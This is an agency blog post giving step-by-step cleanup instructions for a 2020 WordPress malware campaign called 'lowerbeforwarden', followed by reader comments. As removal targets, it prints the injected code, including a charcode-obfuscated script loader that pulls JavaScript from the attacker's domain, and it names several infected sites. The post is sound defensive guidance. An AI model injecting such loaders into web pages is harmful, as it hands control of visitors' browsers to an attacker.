File Manager Hacked: Nasty new Malware doing the rounds – lowerbeforwarden

EDIT 6th Sept 2020 00:02: Due to the high volumes of requests for help with this virus, we’ve recorded a video detailing how to fix it. It’s a live run through of a real site, so the video is 50 minutes long, but will hopefully help people solve their issues

EDIT 5th Sept 2020 15:13: Wow this is affecting a lot of sites! Just done one that was slightly different. In the script the n=ns1 part was n=nb5 and this one had some encrypted code too (see further down). Also it had added an exclusion in the Wordfence advanced section to remain undetected

EDIT 5th Sept 2020 14:08: A zero day vulnerability was detected in the popular File Manager plugin and that’s one of the ways the virus was getting in. This has been patched – please update your File Manager plugin if you have it installed

A nasty new malware has started making the rounds. The virus seems to be targeting WordPress sites – this makes sense as not only does WordPress make up over 1/3 of the internet, but a lot of WordPress sites are out of date DIY builds.

Where most target a single vulnerability, the “lowerbeforwarden Virus” seems to use a number of known vulnerabilities.

It seemed to have only reared it’s ugly head on 31st August (2020), so it’s a bit early to tell a full list of vulnerabilities targeted or if this is a new day zero, but a quick search out there shows lots of site infected this week including:

  • www.airlinehaber.com
  • www.capitalone.com.vn
  • lcps.org.uk
  • megastararena.com
  • www.aplapollo.com
  • www.nahhs.com

How to remove the Lowerbeforwarden Virus from your site

1) The first step is damage limitation, so pop your hosting in maintenance mode or “suspend” the service. It’s better that your visitors see a temporarily unavailable message than some random site.

2) Take a full back-up of your code and database.

3) Download your site to your local machine and open the folder in a text editor such as Atom, Sublime, Dreamweaver, etc. Do a “find in files for the following code and then “replace all” with an empty field:

<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>

3B) Update: Some sites seem to have the n=ns1 bit replaced with n=nb5 and also have these scripts to remove in the same method:

<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(script); elem.type = text/javascript elem.src = https://scripts.lowerbeforwarden.ml/src.jselem.appendAfter(document.getElementsByTagName(script)[0]);elem.appendAfter(document.getElementsByTagName(head)[0]);document.getElementsByTagName(head)[0].appendChild(elem);})();</script>

4) Once you’ve re-uploaded those files you should be able to login to WordPress again without getting redirected. Install the Wordfence plugin and run a scan to clean up any stray malicious files.

5) Some people have also reported having the same code in the database too, so you may need to open your database in something like PHPmyAdmin and run this sql command:

UPDATE wp_posts SET post_content = (REPLACE (post_content, β€œ<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>”, ""));

Obviously if this all seems like too much, just give us a shout at [email protected] and we’ll fix it for you πŸ™‚

How to prevent it happening again

WordPress is one of the most updated CMSs going, so in most cases if you keep WordPress and the plugins updated you’ll be safe from this kind of virus. Keep Wordfence installed too as it’s a great 1st defence.

Chris Ryu "Chameleon"

Chris has been a developer for over 15 years. Known for his unique experience crosses over many fields.

Comments: 22

  • James Colmer September 5, 2020 7:25 pm

    Oh my god you are a life saver thank you so much

  • Andres GP September 5, 2020 7:40 pm

    Got this virus in one of the sites i administer, I decided to just delete all theme and plugin files and do a wordpress reinstall to ensure.

    I have found also in the assets/js folders of many of the plugins and other folders, to have all js files modified with an “append” code

      • Andres GP September 6, 2020 6:06 pm

        Hi Chris, Watching your video now to ensure site is all set with security, thanks for this big contribution my friend.

        You were totally right, we though we fixed it and yesterday night the malware ran again through a script on the uploads folder, amazing and tricky hack!

        I did a whole server delete except upload files (pics only), and wpconfig as well, and recopied all new wordpress version and theme.

        Things are going well and now running a wordfence scan.

        Thanks for your help and follow up on this malware!

      • Andres GP September 6, 2020 6:07 pm

        BTW we have also found a whole lot of this script in database like you mentioned in video.

  • Andres to france September 5, 2020 10:39 pm

    muchas gracias thanks you!!!!
    problem result for me,
    problm in header.php to my theme
    and in database I search lowerbeforwarden and deleted

    thanks Dorset!

  • Felipe September 6, 2020 3:58 am

    Thank you for this article! A real life saver indeed! πŸ˜€

  • Aaron September 6, 2020 11:58 am

    Hi, I work for Dorset Tech, just so some people are aware some themes come with: Theme Options which allows you to change theme settings and styling specific for your theme. Sometimes it is best to export these options. Incase it loses some of the custom styling due to plugin deactivation etc, or you may just need to go back to theme options and Save Settings which i had to do on a site i was fixing from this nasty virus. Hope this helps someone πŸ™‚

  • Mark D September 6, 2020 5:02 pm

    When you go into the SQL and run the update query, yours doesn’t work at first. What was the problem you fixed to make it work? I have having the same issue. If I can’t get it to work, do I just go to every row that has the malicious script in it, and delete it?

    Also, most of my infected files appear to be plugins, so can I just delete them all and then reinstall fresh versions?

      • LM September 8, 2020 6:10 pm

        how do you ignore and run it anyway? I can’t seem to do it as it gives me an error every time.

  • Aliyu Ndagi September 6, 2020 8:28 pm

    Hello I also got the same problem this morning, pls how can I upload it on my SQL or can you please help me do it?
    I’m ruining out of data…

      • Aliyu Ndagi September 6, 2020 8:48 pm

        OK sir, thank you very much.
        I will send it now.

  • steve September 7, 2020 7:42 am

    is it recommended to change database passwords etc after this infection?

  • Suso September 8, 2020 5:47 pm

    Hello Crhis, thank you so much for your help, i found in Uploads folder the initial problem:

    a php archive called: wp-stream.php
    and an archive called: Ite_

    from there the virus expand itself, seems like this virus get an update or something similar, i found SQL orders on Ite_ archives to rename his code.

    Thak you again!

  • R October 2, 2020 11:58 am

    I was affected by this but i cant find anything in the database.

    I have had multiple files and folders created. One being a download folder in the public html directory with moban.html and index.html. I then had multiple gif’s which seem to actually be htaccess files. The attacker had added a google verification html file to the public html folder and used it to add many sitemaps/categorymaps and taken over control of google console.

    There is also an assortment of other php files etc which i have removed. Although im not confident the backdoor has been closed. Any advice?

    Usually i would just restore from backups but all my backups seem to be affected too..

  • Belinda October 24, 2020 9:26 pm

    You’ve ended my foΥ½r day lΠΎng hunt!
    God Bless you man. Have a great day!

Sorry, the comment form is closed at this time.

Get a Quote

Test out our instant price calculator!

Get A Price In Seconds
NHS Audi Vitality Mind
Dorset Council Dorset Chamber Gillingham Chamber of Commerce Theo Paphitis retail group
Apple Developer Google Partner Amazon Web Services Ionos Platinum Partner